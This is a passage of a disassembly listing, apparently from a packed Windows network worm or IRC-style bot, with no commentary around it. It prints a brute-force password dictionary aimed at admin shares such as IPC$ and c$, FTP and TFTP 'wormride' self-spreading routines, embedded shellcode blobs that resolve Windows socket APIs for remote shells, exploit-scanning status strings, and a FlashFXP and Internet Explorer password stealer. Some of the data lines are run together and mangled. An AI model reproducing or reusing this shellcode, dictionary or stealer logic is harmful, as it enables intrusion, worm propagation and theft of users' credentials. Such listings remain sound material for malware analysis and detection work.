inc ecx
add [eax], dh
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-67FFBE41h], ah
mov edi, 0BF940041h
inc ecx
add [eax], ch
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax], ah
retn
; ---------------------------------------------------------------------------
inc ecx
add [edi+edi*4-407BFFBFh], cl
inc ecx
add [eax], bl
retn
; ---------------------------------------------------------------------------
inc ecx
add [ebx+eax*8], dl
inc ecx
add [esp+eax*8+41h], dh
add [eax], cl
retn
; ---------------------------------------------------------------------------
dw 41h
dd offset aStudent ; "student"
; ---------------------------------------------------------------------------
clc
retn 41h
; ---------------------------------------------------------------------------
dd offset aTeacher ; "teacher"
dd offset aStaff ; "staff"
dd 0
aWinpass db 'winpass',0
aBlank db 'blank',0
align 4
aXp_0 db 'xp',0
align 4
aNokia db 'nokia',0
align 10h
aHp db 'hp',0
align 4
aOrainstall db 'orainstall',0
align 10h
aSqlpassoainsta db 'sqlpassoainstall',0
align 4
aDb1234 db 'db1234',0
align 4
aDb2 db 'db2',0
aDb1 db 'db1',0
aDatabasepasswo db 'databasepassword',0
align 4
aDatabasepass db 'databasepass',0
align 4
aDbpassword db 'dbpassword',0
align 4
aDbpass db 'dbpass',0
align 4
aDomainpassword db 'domainpassword',0
align 4
aDomainpass db 'domainpass',0
align 4
aHello db 'hello',0
align 10h
aHell db 'hell',0
align 4
aLove db 'love',0
align 10h
aMoney db 'money',0
align 4
aSlut db 'slut',0
align 10h
aBitch db 'bitch',0
align 4
aFuck db 'fuck',0
align 10h
aExchange db 'exchange',0
align 4
aLoginpass db 'loginpass',0
align 4
aLogin db 'login',0
align 10h
aQwe db 'qwe',0 ; DATA XREF: .packed:0041BE4C�o
aZxc db 'zxc',0 ; DATA XREF: .packed:0041BE48�o
aAsd db 'asd',0 ; DATA XREF: .packed:0041BE44�o
aQaz db 'qaz',0 ; DATA XREF: .packed:0041BE40�o
aWin2000 db 'win2000',0 ; DATA XREF: .packed:0041BE3C�o
aWinnt db 'winnt',0 ; DATA XREF: .packed:0041BE38�o
align 10h
aWinxp db 'winxp',0 ; DATA XREF: .packed:0041BE34�o
align 4
aWin2k db 'win2k',0 ; DATA XREF: .packed:0041BE30�o
align 10h
aWin98 db 'win98',0 ; DATA XREF: .packed:0041BE2C�o
align 4
aWindows db 'windows',0 ; DATA XREF: .packed:0041BE28�o
aOeminstall db 'oeminstall',0 ; DATA XREF: .packed:0041BE20�o
align 4
aOem db 'oem',0 ; DATA XREF: .packed:0041BE18�o
aAccounting db 'accounting',0 ; DATA XREF: .packed:0041BE08�o
align 4
aAccounts db 'accounts',0 ; DATA XREF: .packed:0041BE04�o
align 4
aLetmein db 'letmein',0 ; DATA XREF: .packed:0041BE00�o
aSex db 'sex',0 ; DATA XREF: .packed:0041BDFC�o
aOutlook db 'outlook',0 ; DATA XREF: .packed:0041BDEC�o
aMail db 'mail',0 ; DATA XREF: .packed:0041BDE8�o
align 4
aQwerty db 'qwerty',0 ; DATA XREF: .packed:0041BDE4�o
align 4
aTemp123 db 'temp123',0 ; DATA XREF: .packed:0041BDE0�o
aTemp db 'temp',0 ; DATA XREF: .packed:0041BDDC�o
align 4
aNull db 'null',0 ; DATA XREF: .packed:0041BDD8�o
align 4
aDefault db 'default',0 ; DATA XREF: .packed:0041BDC8�o
aChangeme db 'changeme',0 ; DATA XREF: .packed:0041BDC4�o
align 4
aDemo db 'demo',0 ; DATA XREF: .packed:0041BDB4�o
align 10h
aTest db 'test',0
align 4
a2005 db '2005',0
align 10h
a2004 db '2004',0
align 4
a2001 db '2001',0
align 10h
aSecret db 'secret',0
align 4
aPayday db 'payday',0
align 10h
aDeadline db 'deadline',0
align 4
aWork db 'work',0
align 4
a1234567890 db '1234567890',0
align 10h
a123456789 db '123456789',0
align 4
a12345678 db '12345678',0
align 4
a1234567 db '1234567',0
a123456 db '123456',0
align 4
a12345 db '12345',0
align 10h
a1234 db '1234',0
align 4
a123 db '123',0
a12 db '12',0
align 10h
a1:
unicode 0, <1>,0
a007 db '007',0
aPwd db 'pwd',0
aPass db 'pass',0
align 4
aPass1234 db 'pass1234',0
align 10h
aDba db 'dba',0
aPasswd db 'passwd',0
align 4
aPassword db 'password',0 ; DATA XREF: .packed:0041D790�o
align 4
aPassword1 db 'password1',0
align 4
aAbc db 'abc',0
aAb db 'ab',0
align 4
aA_0:
unicode 0, <a>,0
aIpc db 'IPC$',0 ; DATA XREF: .packed:0041BD04�o
align 4
aPrint db 'print$',0
align 10h
aCDocumentsAndS db 'C$\Documents and Settings\All Users\Documents\$',0
aAdmin_0 db 'admin$',0
align 4
aAdminSystem32 db 'Admin$\system32',0
aCWindowsSystem db 'c$\windows\system32',0 ; DATA XREF: .packed:0041BCF0�o
aCWinntSystem32 db 'c$\winnt\system32',0
align 10h
aCWindows db 'c$\windows',0
align 4
aCWinnt db 'c$\winnt',0
align 4
aEShared db 'e$\shared',0
align 4
aDShared db 'd$\shared',0 ; DATA XREF: .packed:0041BCDC�o
align 10h
aCShared db 'c$\shared',0
align 4
aE db 'e$',0
align 10h
aD db 'd$',0 ; DATA XREF: .packed:0041BCD0�o
align 4
aC db 'c$',0 ; DATA XREF: .packed:0041BCCC�o
align 4
aStaff db 'staff',0 ; DATA XREF: .packed:0041BCC4�o
; .packed:0041BF7C�o
align 10h
aTeacher db 'teacher',0 ; DATA XREF: .packed:0041BCC0�o
; .packed:0041BF78�o
aOwner db 'owner',0
align 10h
aStudent db 'student',0 ; DATA XREF: .packed:0041BCB8�o
; .packed:0041BF70�o
aIntranet db 'intranet',0
align 4
aLan_0 db 'lan',0
aMain db 'main',0 ; DATA XREF: .packed:00416ACA�o
; .packed:00416AEC�o
align 10h
aOffice db 'office',0
align 4
aControl db 'control',0
aSiemens db 'siemens',0
aCompaq db 'compaq',0
align 10h
aDell db 'dell',0
align 4
aCisco db 'cisco',0
align 10h
aIbm db 'ibm',0
aOracle db 'oracle',0
align 4
aSql db 'sql',0
aSa db 'sa',0
align 4
aData db 'data',0
align 4
aAccess db 'access',0
align 4
aDatabase db 'database',0
align 10h
aDomain db 'domain',0
align 4
aGod db 'god',0
aBackup db 'backup',0
align 4
aTechnical db 'technical',0
align 10h
aMary db 'mary',0
align 4
aKatie db 'katie',0
align 10h
aKate db 'kate',0
align 4
aGeorge db 'george',0
align 10h
aEric db 'eric',0
align 4
aNone db 'none',0
align 10h
aGuest db 'guest',0
align 4
aChris db 'chris',0
align 10h
aIan db 'ian',0
aNeil db 'neil',0
align 4
aLee db 'lee',0
aBrian db 'brian',0
align 4
aSusan db 'susan',0
align 10h
aSue db 'sue',0 ; DATA XREF: .packed:0041BC24�o
; .packed:0041BE78�o
aSam db 'sam',0 ; DATA XREF: .packed:0041BC20�o
; .packed:0041BE74�o
aLuke db 'luke',0 ; DATA XREF: .packed:0041BC1C�o
; .packed:0041BE70�o
align 10h
aPeter db 'peter',0 ; DATA XREF: .packed:0041BC18�o
; .packed:0041BE6C�o
align 4
aJohn db 'john',0 ; DATA XREF: .packed:0041BC14�o
; .packed:0041BE68�o
align 10h
aMike db 'mike',0 ; DATA XREF: .packed:0041BC10�o
; .packed:0041BE64�o
align 4
aBill db 'bill',0 ; DATA XREF: .packed:0041BC0C�o
; .packed:0041BE60�o
align 10h
aFred db 'fred',0 ; DATA XREF: .packed:0041BC08�o
; .packed:0041BE5C�o
align 4
aJoe db 'joe',0 ; DATA XREF: .packed:0041BC04�o
; .packed:0041BE58�o
aJen db 'jen',0 ; DATA XREF: .packed:0041BC00�o
; .packed:0041BE54�o
aBob db 'bob',0 ; DATA XREF: .packed:0041BBFC�o
; .packed:0041BE50�o
aWwwadmin db 'wwwadmin',0 ; DATA XREF: .packed:0041BBF8�o
; .packed:0041BE24�o
align 10h
aOemuser db 'oemuser',0 ; DATA XREF: .packed:0041BBF4�o
; .packed:0041BE1C�o
aUser db 'user',0 ; DATA XREF: .packed:0041BBF0�o
; .packed:0041BE14�o
align 10h
aHomeuser db 'homeuser',0 ; DATA XREF: .packed:0041BBEC�o
; .packed:0041BE10�o
align 4
aHome db 'home',0 ; DATA XREF: .packed:0041BBE8�o
; .packed:0041BE0C�o
align 4
aInternet db 'internet',0 ; DATA XREF: .packed:0041BBE4�o
; .packed:0041BDF8�o
align 10h
aWww db 'www',0 ; DATA XREF: .packed:0041BBE0�o
; .packed:0041BDF4�o
aWeb db 'web',0 ; DATA XREF: .packed:0041BBDC�o
; .packed:0041BDF0�o
aRoot db 'root',0 ; DATA XREF: .packed:0041BBD8�o
; .packed:0041BDD4�o
align 10h
aServer_0 db 'server',0 ; DATA XREF: .packed:0041BBD4�o
; .packed:0041BDD0�o
align 4
aLinux db 'linux',0 ; DATA XREF: .packed:0041BBCC�o
; .packed:0041BDC0�o
align 10h
aUnix db 'unix',0 ; DATA XREF: .packed:0041BBC8�o
; .packed:0041BDBC�o
align 4
aComputer db 'computer',0 ; DATA XREF: .packed:0041BBC4�o
; .packed:0041BDB8�o
align 4
aAdm db 'adm',0 ; DATA XREF: .packed:0041BBC0�o
aAdmin db 'admin',0 ; DATA XREF: .packed:0041BBBC�o
align 10h
aAdmins db 'admins',0 ; DATA XREF: .packed:0041BBB8�o
align 4
aAdministrat db 'administrat',0 ; DATA XREF: .packed:0041BBB4�o
aAdministrateur db 'administrateur',0 ; DATA XREF: .packed:0041BBB0�o
align 4
aAdministrador db 'administrador',0 ; DATA XREF: .packed:0041BBAC�o
; .packed:0041BD14�o
align 4
aAdministrator db 'administrator',0 ; DATA XREF: .packed:0041BBA8�o
; .packed:0041BD10�o
align 4
a231 db '231 -',0Dh,0Ah,0 ; DATA XREF: sub_41113B:loc_4119BA�o
a221 db '221 -',0Dh,0Ah,0 ; DATA XREF: sub_41113B+843�o
dword_41C514 dd 135A78h align 10h
unk_41C520 db 2Dh ; - ; DATA XREF: sub_41113B+80D�o
db 3, 30h, 34h
db 2
db 25h, 73h, 3
db 2
aU_TransferToSC db '- %u. Transfer to %s complete.',0
aFtp_0 db 'ftp',0 ; DATA XREF: sub_41113B+808�o
dword_41C54C dd 157728h dd 2 dup(0)
dword_41C558 dd 20363232h, 0A0D2Dh ; sub_41113B+7AA�o
aX32000Fh1024Ja db '-x 3 2000 fh 1024 Jan 1 0:00 .',0Dh,0Ah ; DATA XREF: sub_41113B+6AF�o
db 'drwxr-xr-x 3 2000 fh 1024 Jan 1 0:00 ..',0Dh,0Ah
db '-rwxr-xr-x 3 2000 fh %u Jan 1 0:00 %s',0Dh,0Ah,0
align 4
a150 db '150 -',0Dh,0Ah,0 ; DATA XREF: sub_41113B+5C7�o
; sub_41113B+751�o
dword_41C5DC dd 146AF8h dd 2 dup(0)
dword_41C5E8 dd 20333132h, 0A0D7525h, 0dword_41C5F4 dd 1227B0h align 10h
aUUUUUU db '%u,%u,%u,%u,%u,%u',0 ; DATA XREF: sub_41113B+427�o
align 4
dword_41C614 dd 0F6578h align 10h
dword_41C620 dd 20353234h, 0A0D2Dhdword_41C628 dd 0FED08h dd 2 dup(0)
dword_41C634 dd 20303032h, 0A0D2Dh ; sub_41113B+4A6�o
dword_41C63C dd 128230h dd 2 dup(0)
dword_41C648 dd 20373532h, 20222F22h, 0A0D2Dhdword_41C654 dd 1F738h dd 0
dword_41C65C dd 20313132h, 0A0D2Dhdword_41C664 dd 1232B8h align 10h
dword_41C670 dd 20353132h, 0A0D2Dhdword_41C678 dd 124AF8h dd 2 dup(0)
dword_41C684 dd 20303332h, 0A0D2Dhdword_41C68C dd 0FECD8h dd 2 dup(0)
dword_41C698 dd 20313333h, 0A0D2Dhdword_41C6A0 dd 163AE8h dd 2 dup(0)
dword_41C6AC dd 0A0D20h ; sub_41113B+115�o ...
dword_41C6B0 dd 20303232h, 0A0D2Dhdword_41C6B8 dd 303332h dword_41C6BC dd 53534150h, 0A0D3120h, 0dword_41C6C8 dd 313333h dword_41C6CC dd 52455355h, 0A0D3120h, 0dword_41C6D8 dd 303232h unk_41C6DC db 2Dh ; - ; DATA XREF: sub_411BBC+115�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aRunningFtpWorm db '- Running FTP wormride thread',0
align 4
a127_0_0_1 db '127.0.0.1',0 ; DATA XREF: sub_411BBC+6E�o
align 10h
aFtpWormrideThr db 'FTP wormride thread',0 ; DATA XREF: sub_411D68+36�o
dword_41C724 dd 4000500h, 7868746Bh, 0unk_41C730 db 2Dh ; - ; DATA XREF: sub_411DC5+5BD�o
db 3, 30h, 34h
db 2
db 25h, 73h, 3
db 2
aU_TftpTransfer db '- %u. tftp transfer to %s complete.',0
align 10h
aWormride db 'wormride',0 ; DATA XREF: sub_411DC5+5B8�o
align 4
dword_41C76C dd 1000500h, 656C6946h, 746F4E20h, 756F4620h, 646Eh
; DATA XREF: sub_411DC5+367�o
aOctet db 'octet',0 ; DATA XREF: sub_411DC5+333�o
; sub_411DC5+345�o
align 4
unk_41C788 db 2Dh ; - ; DATA XREF: sub_411DC5+144�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aRunningTftpWor db '- Running TFTP wormride thread',0
aTftpWormrideTh db 'TFTP wormride thread',0 ; DATA XREF: sub_4123F6+2B�o
align 4
loc_41C7C8: ; DATA XREF: sub_4125DF+50�o
jmp short loc_41C7DF
; ---------------------------------------------------------------------------
loc_41C7CA: ; CODE XREF: .packed:loc_41C7DF�p
mov ecx, 0
xor ecx, 0
pop esi
loc_41C7D6: ; CODE XREF: .packed:0041C7DB�j
xor byte ptr [ecx+esi-1], 0
loop loc_41C7D6
jmp short near ptr dword_41C7E4
; ---------------------------------------------------------------------------
loc_41C7DF: ; CODE XREF: .packed:loc_41C7C8�j
call loc_41C7CA
; ---------------------------------------------------------------------------
dword_41C7E4 dd 0 dword_41C7E8 dd 8B64DB33h, 408B3043h, 1C708B0Ch, 8788BADh, 45E8h, 8B565300h
; DATA XREF: sub_4124A0+CB�o
dd 5C8B3C5Fh, 0DF03783Bh, 205B8B53h, 8353DF03h, 338B04C3h
dd 0C933F703h, 0C1C832ACh, 0C08405C1h, 0CA2BF675h, 2B58E975h
dd 5EEBD1D8h, 3245E03h, 0B8B66DFh, 31C5E8Bh, 8B048BDFh
dd 5B5EC703h, 685EE0FFh, 3233h, 32737768h, 92BA545Fh, 0FF84046Eh
dd 81F88BD6h, 200ECh, 53EC8B00h, 26A016Ah, 835383BAh, 53D6FF00h
dd 6853h, 2680000h, 8B000000h, 6AD88BD4h, 0BA535210h, 5A603063h
dd 0B450D6FFh, 53555002h, 605800BAh, 0BFD6FFE2h, 0
; ---------------------------------------------------------------------------
jmp ebp
; ---------------------------------------------------------------------------
align 4
dword_41C89C dd 8B64DB33h, 408B3043h, 1C708B0Ch, 8788BADh, 45E8h, 8B565300h
; DATA XREF: sub_4124A0+8C�o
dd 5C8B3C5Fh, 0DF03783Bh, 205B8B53h, 8353DF03h, 338B04C3h
dd 0C933F703h, 0C1C832ACh, 0C08405C1h, 0CA2BF675h, 2B58E975h
dd 5EEBD1D8h, 3245E03h, 0B8B66DFh, 31C5E8Bh, 8B048BDFh
dd 5B5EC703h, 685EE0FFh, 3233h, 32737768h, 92BA545Fh, 0FF84046Eh
dd 81F88BD6h, 200ECh, 53EC8B00h, 26A016Ah, 835383BAh, 53D6FF00h
dd 2685353h, 8B000000h, 6AD88BD4h, 0BA535210h, 0C2A69000h
dd 5040D6FFh, 3B7ABA53h, 0D6FFA173h, 0BA535050h, 69D310h
dd 0D88BD6FFh, 0B450C033h, 53555002h, 605800BAh, 0BFD6FFE2h
dd 0
; ---------------------------------------------------------------------------
jmp ebp
; ---------------------------------------------------------------------------
align 4
dword_41C964 dd 8B64DB33h, 408B3043h, 1C708B0Ch, 8788BADh, 45E8h, 8B565300h
; DATA XREF: sub_4124A0+36�o
dd 5C8B3C5Fh, 0DF03783Bh, 205B8B53h, 8353DF03h, 338B04C3h
dd 0C933F703h, 0C1C832ACh, 0C08405C1h, 0CA2BF675h, 2B58E975h
dd 5EEBD1D8h, 3245E03h, 0B8B66DFh, 31C5E8Bh, 8B048BDFh
dd 5B5EC703h, 685EE0FFh, 3233h, 32737768h, 92BA545Fh, 0FF84046Eh
dd 81F88BD6h, 200ECh, 6AEC8B00h, 55544310h, 7232BA53h
dd 0D6FF1979h, 27D8166h, 0ED751111h, 22047D81h, 75222222h
dd 2B450E4h, 0BA535550h, 0E2605800h, 7D81D6FFh, 20EC8300h
dd 0BFEA758Bh, 0
; ---------------------------------------------------------------------------
jmp ebp
; ---------------------------------------------------------------------------
align 4
dword_41CA18 dd 8B20EC83h, 45D89ECh, 81007D89h, 200ECh, 14658900h, 8B64DB33h
; DATA XREF: sub_412720+71�o
dd 408B3043h, 1C708B0Ch, 8788BADh, 0E8087D89h, 45h, 5F8B5653h
dd 3B5C8B3Ch, 53DF0378h, 3205B8Bh, 0C38353DFh, 3338B04h
dd 0ACC933F7h, 0C1C1C832h, 75C08405h, 75CA2BF6h, 0D82B58E9h
dd 35EEBD1h, 0DF03245Eh, 8B0B8B66h, 0DF031C5Eh, 38B048Bh
dd 0FF5B5EC7h, 33685EE0h, 68000032h, 5F327377h, 6E92BA54h
dd 0D6FF8404h, 8B0C4589h, 46A53F8h, 475FF55h, 669000BAh
dd 83D6FFE0h, 850F04F8h, 0C5h, 0E8087D8Bh, 0Dh, 3 dup(0)
dd 18458F00h, 6A026A53h, 68535301h, 0C0000000h, 0BA1875FFh
dd 5C6BD33Dh, 4589D6FFh, 840F401Ch, 8Dh, 330C7D8Bh, 2B450C0h
dd 1475FF50h, 0BA0475FFh, 0E2605800h, 7D8BD6FFh, 74C08508h
dd 41C88B1Eh, 8D535774h, 5051104Dh, 0FF1475FFh, 0B9BA1C75h
dd 0FFCBF5BEh, 74C085D6h, 0FFC5EB40h, 5CBA1C75h, 0FF9DC593h
dd 58446AD6h, 0FC8BE02Bh, 33ABD78Bh, 59106AC0h, 8BFDE2ABh
dd 5252087Dh, 50505050h, 0FF505050h, 2CBA1875h, 0FF2694F1h
dd 0C7FE58D6h, 1BA5053h, 0FFDE34D6h, 1C75FFD6h, 0C5935CBAh
dd 0FFD6FF9Dh, 3DBA1875h, 0FF27CF53h, 0C7D8BD6h, 0BA0475FFh
dd 7315685h, 7D8BD6FFh, 46BABA08h, 0D6FFC10Ch
db 0
byte_41CB95 db 0E3h ; DATA XREF: sub_4125DF+CF�r
; sub_4125DF+E4�w
align 4
dword_41CB98 dd 4113E68Bh ; sub_4125DF+75�w
align 10h
off_41CBA0 dd offset dword_41CC4C ; DATA XREF: sub_4127D0+77�r
dd offset dword_41CC40
dd 0
dd offset dword_41CC2C
dd offset dword_41CC20
align 8
or ah, cl
inc ecx
add ah, bh
retf
; ---------------------------------------------------------------------------
dw 41h
dd 0
dd offset dword_41CBE8
dd offset dword_41CBDC
dd 4 dup(0)
dword_41CBDC dd 808FD6DAh, 2 dup(0) ; .packed:0041DA90�o
dword_41CBE8 dd 0DB999E9Ah, 0D5ABC9FCh, 0BEB1F3E6h, 2 dup(0)
; DATA XREF: .packed:0041CBC4�o
; .packed:0041DA8C�o
dd 8284D6D3h, 0A9h, 0
dd 0DE999E9Ah, 0DFA09EFCh, 0FDA4EAACh, 0DE91BB92h, 2 dup(0)
dword_41CC20 dd 808ED7D7h, 2 dup(0) ; .packed:0041DA78�o
dword_41CC2C dd 0C3999E9Ah, 0DBBA96ECh, 0BAF0FDA9h, 98B395h, 0
; DATA XREF: .packed:0041CBAC�o
; .packed:0041DA74�o
dword_41CC40 dd 8381DED3h, 2 dup(0) ; .packed:off_41DA6C�o
dword_41CC4C dd 0D5999E9Ah, 0CCAB8EF3h, 0B6ACF5A0h, 0CB9EB7D5h, 2 dup(0)
; DATA XREF: .packed:off_41CBA0�o
; .packed:off_41DA68�o
dword_41CC64 dd 72h dword_41CC68 dd 62h dword_41CC6C dd 63h dword_41CC70 dd 3430032Dh, 3752502h, 52202D02h, 696E6E75h, 7320676Eh
; DATA XREF: sub_412E04+64�o
dd 6C6C6568h, 65646F63h, 72657320h, 20726576h, 70206E6Fh
dd 2074726Fh, 2343003h, 2037325h, 0
dword_41CCA8 dd 6C656853h, 646F636Ch, 65732065h, 72657672h, 206E6F20h
; DATA XREF: sub_412F07+98�o
dd 74726F70h, 34300320h, 3752502h, 2, 0
byte_41CCD0 db 86h ; DATA XREF: sub_41294E+3C�o
; sub_41294E+4C�o ...
db 85h, 0D8h, 0DDh
dd 0AFh, 2 dup(0)
dd 0D3000000h, 82D5h, 3 dup(0)
db 2 dup(0)
dword_41CCF6 dd 0 ; sub_412FC6+31�r ...
dword_41CCFA dd 0 ; sub_414052+B5�r ...
off_41CCFE dd offset sub_410649 ; DATA XREF: sub_41294E+1C�r
; sub_412FC6+18�r ...
dw 3
dd 0
dd 838C0000h, 8EFCC0C3h, 0A6h, 2 dup(0)
dd 82D2D600h, 6 dup(0)
dd offset sub_410B52
dd 3, 10h dup(0)
dword_41CD80 dd 6E695728h, 293233hdword_41CD88 dd 696E5528h, 2978hdword_41CD90 dd 63617041h, 252F6568h, 75haApache db 'Apache',0 ; DATA XREF: sub_41308F+1B9�o
align 4
aMicrosoftIisU_ db 'Microsoft-IIS/%u.%u',0 ; DATA XREF: sub_41308F+130�o
aMicrosoftIis db 'Microsoft-IIS',0 ; DATA XREF: sub_41308F+FC�o
align 4
aServer db 'Server:',0 ; DATA XREF: sub_41308F+7A�o
aOptionsHttp1_0 db 'OPTIONS / HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_41308F+B�o
db 0Dh,0Ah,0
align 4
unk_41CDE8 db 53h ; S ; DATA XREF: sub_41349C+5E4�o
db 63h, 61h, 6Eh
db 6Eh ; n
db 65h, 64h, 20h
db 3
db 30h, 34h, 2
db 25h ; %
db 73h, 3, 2
db 3Ah ; :
db 25h, 73h, 20h
db 69h ; i
db 6Eh, 20h, 3
db 30h ; 0
db 34h, 2, 25h
db 30h ; 0
db 2Eh, 32h, 66h
db 3
db 2, 73h, 65h
db 63h ; c
db 2Eh, 20h, 3
db 30h ; 0
db 34h, 2, 25h
db 75h ; u
db 3, 2, 20h
aOpenIpSFound db 'open IP(s) found',0
align 4
dword_41CE2C dd 2343003h, 2037325h, 2073253Ah, 6F207369h, 6E6570h
; DATA XREF: sub_41349C+55E�o
dword_41CE40 dd 3430032Dh, 3752502h, 53202D02h, 6E6E6163h, 20676E69h
; DATA XREF: sub_41349C+343�o
dd 2343003h, 2037325h, 2073253Ah, 20726F66h, 2343003h
dd 2037525h, 63657320h, 28646E6Fh, 2973h
dword_41CE78 dd 6E616353h, 676E696Eh, 34300320h, 3732502h, 73253A02h
; DATA XREF: sub_41349C+305�o
dd 726F6620h, 34300320h, 3752502h, 65732002h, 646E6F63h
dd 297328h
unk_41CEA4 db 53h ; S ; DATA XREF: sub_413AB0+1DC�o
db 63h, 61h, 6Eh
db 6Eh ; n
db 69h, 6Eh, 67h
db 20h
db 3, 30h, 34h
db 2
db 25h, 73h, 3
db 2
db 3Ah, 25h, 73h
db 20h
db 66h, 6Fh, 72h
db 20h
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aSecondSTUSU db ' second(s), t:%u s:%u',0
align 4
dword_41CEDC dd 3430032Dh, 3752502h, 41202D02h, 6D657474h, 64657470h
; DATA XREF: sub_413CB3+30E�o
dd 34300320h, 3752502h, 78652002h, 696F6C70h, 69746174h
dd 73286E6Fh, 6E6F2029h, 34300320h, 3752502h, 50492002h
dd 2E297328h, 0
dword_41CF20 dd 65747441h, 6974706Dh, 7420676Eh, 7865206Fh, 696F6C70h
; DATA XREF: sub_413CB3+2B0�o
dd 30032074h, 73250234h, 77200203h, 20687469h, 2343003h
dd 2037325h, 2E2E2Eh
unk_41CF50 db 2Dh ; - ; DATA XREF: sub_413CB3+31�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aAttemptingTo_0 db '- Attempting to exploit IP',27h,'s in list.',0
align 10h
aAttemptingToEx db 'Attempting to exploit IP',27h,'s in list.',0 ; DATA XREF: sub_413FE7+52�o
dword_41CFA4 dd 3003203Ah, 75250234h, 202E0203h, 0aExploitStatist db 'Exploit statistics - ',0 ; DATA XREF: sub_414052+29�o
align 4
aListingExploit db 'Listing exploit statistics',0 ; DATA XREF: sub_41417D+2B�o
align 4
dword_41CFE8 dd 62616E55h, 7420656Ch, 6F63206Fh, 63656E6Eh, 6F742074h
; DATA XREF: sub_4141C1+D8�o
dd 34300320h, 3732502h, 6F702002h, 3207472h, 25023430h
dd 2E020373h, 0
dword_41D018 dd 656D6954h, 2074756Fh, 7563636Fh, 20646572h, 6C696877h
; DATA XREF: sub_4141C1+B4�o
dd 6F632065h, 63656E6Eh, 676E6974h, 206F7420h, 2343003h
dd 2037325h, 3430033Ah, 3732502h, 202E02h
dword_41D050 dd 6E6E6F43h, 65746365h, 6F742064h, 34300320h, 3732502h
; DATA XREF: sub_4141C1+78�o
dd 30033A02h, 73250234h, 69200203h, 3003206Eh, 75250234h
dd 203736Dh, 2Eh
dword_41D080 dd 6E6E6F43h, 69746365h, 7420676Eh, 7325206Fh, 726F7020h
; DATA XREF: sub_4142BF+D8�o
dd 30032074h, 73250234h, 203h
unk_41D0A0 db 53h ; S ; DATA XREF: sub_4143B0+221�o
db 63h, 61h, 6Eh
db 6Eh ; n
db 65h, 64h, 20h
db 25h ; %
db 73h, 20h, 69h
db 6Eh ; n
db 20h, 3, 30h
db 34h ; 4
db 2, 25h, 30h
db 2Eh ; .
db 32h, 66h, 3
db 2
db 73h, 65h, 63h
db 2Eh ; .
db 20h, 3, 30h
db 34h ; 4
db 2, 25h, 75h
db 3
db 2, 20h, 6Fh
aPenPortSFound db 'pen port(s) found',0
align 4
dword_41D0DC dd 33A7325h, 25023430h, 20020373h, 6F207369h, 6E6570h
; DATA XREF: sub_4143B0+1BA�o
dword_41D0F0 dd 3430032Dh, 3752502h, 53202D02h, 6E6E6163h, 20676E69h
; DATA XREF: sub_4143B0+81�o
dd 70207325h, 2074726Fh, 2343003h, 2037525h, 3430032Dh
dd 3752502h, 69772002h, 3206874h, 25023430h, 20020375h
dd 6B636F73h, 73287465h, 29h
dword_41D138 dd 6E616353h, 676E696Eh, 20732520h, 74726F70h, 34300320h
; DATA XREF: sub_414600+1BE�o
dd 3752502h, 30032D02h, 75250234h, 77200203h, 20687469h
dd 2343003h, 2037525h, 636F7320h, 2874656Bh, 2973h
aYa36za48dehfrv db 'yA36zA48dEhfrvghGRg57h5UlDv3',0 ; DATA XREF: sub_4147E5+6�o
; sub_4147E5+C6�o
align 4
aSflashfxpSites db '%sFlashFXP\sites.dat',0 ; DATA XREF: sub_4148CE+107�o
align 4
aFlashfxpSites_ db '\FlashFXP\sites.dat',0 ; DATA XREF: sub_4148CE+B6�o
aProgramfiles db 'ProgramFiles',0 ; DATA XREF: sub_4148CE+AB�o
align 10h
aSites_dat db 'sites.dat',0 ; DATA XREF: sub_4148CE:loc_414945�o
align 4
aFlashfxp_exe1 db 'FlashFXP.exe %1',0 ; DATA XREF: sub_4148CE+57�o
aSoftwareClasse db 'SOFTWARE\Classes\Applications\FlashFXP.exe\shell\open\command',0
; DATA XREF: sub_4148CE+15�o
align 4
unk_41D22C db 2Dh ; - ; DATA XREF: sub_414A1E+464�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
db 2Dh, 20h, 4Ch
db 69h ; i
db 73h, 74h, 65h
db 64h ; d
db 20h, 3, 30h
db 34h ; 4
db 2, 25h, 75h
db 3
db 2, 2Fh, 3
db 30h ; 0
db 34h, 2, 25h
db 75h ; u
db 3, 2, 20h
aFlashfxpPass_0 db 'FlashFXP password(s).',0
align 4
dword_41D268 dd 2343003h, 2037525ha_FlashfxpFtpSS db '. FlashFXP - ftp://%s:%s@%s:%s - %s',0
aPass127s db 0Dh,0Ah ; DATA XREF: sub_414A1E+352�o
db 'Pass=%127s',0Dh,0Ah,0
db 0
dword_41D2A4 dd 73550A0Dh, 253D7265h, 73373231h, 0A0Dhdword_41D2B4 dd 6F500A0Dh, 253D7472h, 73373231h, 0A0Dhdword_41D2C4 dd 50490A0Dh, 3231253Dh, 0A0D7337h, 0dword_41D2D4 dd 5E5B255Bh, 0D5D5D5Dh, 0Ahdword_41D2E0 dd 61500A0Dh, 3D7373hdword_41D2E8 dd 73550A0Dh, 3D7265hdword_41D2F0 dd 6F500A0Dh, 3D7472hdword_41D2F8 dd 50490A0Dh, 3Dhdword_41D300 dd 0A0D0A0Dh, 5Bhunk_41D308 db 2Dh ; - ; DATA XREF: sub_414A1E+55�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aListingFlashfx db '- Listing FlashFXP passwords',0
align 10h
aFlashfxpPasswo db 'FlashFXP password stealer',0 ; DATA XREF: sub_414EB0+2B�o
align 4
unk_41D34C db 2Dh ; - ; DATA XREF: sub_414EF4+B8A�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
db 2Dh, 20h, 4Ch
db 69h ; i
db 73h, 74h, 65h
db 64h ; d
db 20h, 3, 30h
db 34h ; 4
db 2, 25h, 75h
db 3
db 2, 20h, 69h
aNternetExplore db 'nternet explorer password(s).',0
align 4
dword_41D388 dd 2343003h, 2037525h, 4549202Eh, 7475413Ah, 6D6F436Fh
; DATA XREF: sub_414EF4+AD8�o
dd 74656C70h, 61502065h, 6F777373h, 20736472h, 6953202Dh
dd 203A6574h, 2343003h, 2037325h, 614E202Eh, 203A656Dh
dd 2343003h, 2037325h, 6150202Eh, 6F777373h, 203A6472h
dd 2343003h, 2037325h, 2Eh
dword_41D3E4 dd 2343003h, 2037525h, 4549202Eh, 7475413Ah, 6F43206Fh
; DATA XREF: sub_414EF4+A2B�o
